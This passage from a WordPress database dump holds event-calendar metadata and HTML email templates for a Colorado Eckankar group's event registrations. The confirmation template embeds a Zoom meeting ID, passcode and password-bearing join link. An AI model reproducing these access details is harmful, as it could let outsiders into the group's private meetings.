height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(179554,268213,'mec_event_status','EventScheduled'),(179555,268213,'mec_moved_online_link',''),(179556,268213,'mec_cancelled_reason',''),(179557,268213,'mec_display_cancellation_reason_in_single_page',''),(179558,268213,'protect_children',''),(179559,268213,'passster_activate_global_protection',NULL),(179560,268213,'passster_activate_protection',NULL),(179561,268213,'passster_protection_type','password'),(179562,268213,'boldgrid_hide_page_title','0'),(179563,268213,'_thumbnail_id','268214'),(179564,268213,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(179565,268213,'boldgrid_in_page_containers','1'),(179567,268213,'_dp_original','266545'),(179568,268213,'_edit_lock','1679111450:2'),(179569,268213,'passster_area_shortcode',''),(179570,268213,'_edit_last','2'),(179717,267696,'_edit_last','2'),(179571,268214,'_wp_attached_file','2023/03/MountainLake.webp'),(179572,268214,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:337;s:4:\"file\";s:25:\"2023/03/MountainLake.webp\";s:8:\"filesize\";i:33160;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"MountainLake-300x169.webp\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:10736;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"MountainLake-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:4784;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:25:\"MountainLake-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:14134;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:25:\"MountainLake-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:22564;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:25:\"MountainLake-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:17396;}s:8:\"tileview\";a:5:{s:4:\"file\";s:25:\"MountainLake-300x337.webp\";s:5:\"width\";i:300;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:18980;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(179573,268215,'mec_color',''),(179574,268215,'mec_location_id','118'),(179575,268215,'mec_dont_show_map','0'),(179576,268215,'mec_organizer_id','1'),(179577,268215,'mec_read_more',''),(179578,268215,'mec_more_info',''),(179579,268215,'mec_more_info_title',''),(179580,268215,'mec_more_info_target','_self'),(179581,268215,'mec_cost',''),(179582,268215,'mec_currency','a:0:{}'),(179583,268215,'mec_additional_organizer_ids','a:0:{}'),(179584,268215,'mec_additional_location_ids','a:0:{}'),(179585,268215,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-05-03\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-05-03\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(179586,268215,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(179587,268215,'mec_certain_weekdays','a:0:{}'),(179588,268215,'mec_allday','0'),(179589,268215,'one_occurrence','0'),(179590,268215,'mec_hide_time','0'),(179591,268215,'mec_hide_end_time','0'),(179592,268215,'mec_comment',''),(179593,268215,'mec_timezone','global'),(179594,268215,'mec_countdown_method','global'),(179595,268215,'mec_public','1'),(179596,268215,'mec_start_date','2023-05-03'),(179597,268215,'mec_start_time_hour','7'),(179598,268215,'mec_start_time_minutes','0'),(179599,268215,'mec_start_time_ampm','PM'),(179600,268215,'mec_start_day_seconds','68400'),(179601,268215,'mec_end_date','2023-05-03'),(179602,268215,'mec_end_time_hour','8'),(179603,268215,'mec_end_time_minutes','0'),(179604,268215,'mec_end_time_ampm','PM'),(179605,268215,'mec_end_day_seconds','72000'),(179606,268215,'mec_repeat_status','0'),(179607,268215,'mec_repeat_type',''),(179608,268215,'mec_repeat_interval','1'),(179609,268215,'mec_repeat_end',''),(179610,268215,'mec_repeat_end_at_occurrences',''),(179611,268215,'mec_repeat_end_at_date',''),(179612,268215,'mec_advanced_days','a:0:{}'),(179613,268215,'mec_in_days',''),(179614,268215,'mec_not_in_days',''),(179615,268215,'mec_hourly_schedules','a:0:{}'),(179616,268215,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(179617,268215,'mec_tickets','a:0:{}'),(179771,268243,'mec_start_time_minutes','30'),(179772,268243,'mec_start_time_ampm','PM'),(179773,268243,'mec_start_day_seconds','66600'),(179774,268243,'mec_end_date','2023-04-03'),(179775,268243,'mec_end_time_hour','7'),(179776,268243,'mec_end_time_minutes','30'),(179777,268243,'mec_end_time_ampm','PM'),(179778,268243,'mec_end_day_seconds','70200'),(179618,268215,'mec_fees_global_inheritance','1'),(179619,268215,'mec_fees','a:0:{}'),(179620,268215,'mec_ticket_variations_global_inheritance','1'),(179621,268215,'mec_ticket_variations','a:0:{}'),(179622,268215,'mec_reg_fields_global_inheritance','1'),(179623,268215,'mec_reg_fields','a:0:{}'),(179624,268215,'mec_bfixed_fields','a:0:{}'),(179625,268215,'mec_op','a:0:{}'),(179626,268215,'mec_fields','a:0:{}'),(179627,268215,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>891 2510 3432<br />\r\n<b>Passcode:</b> 162109</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9914:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            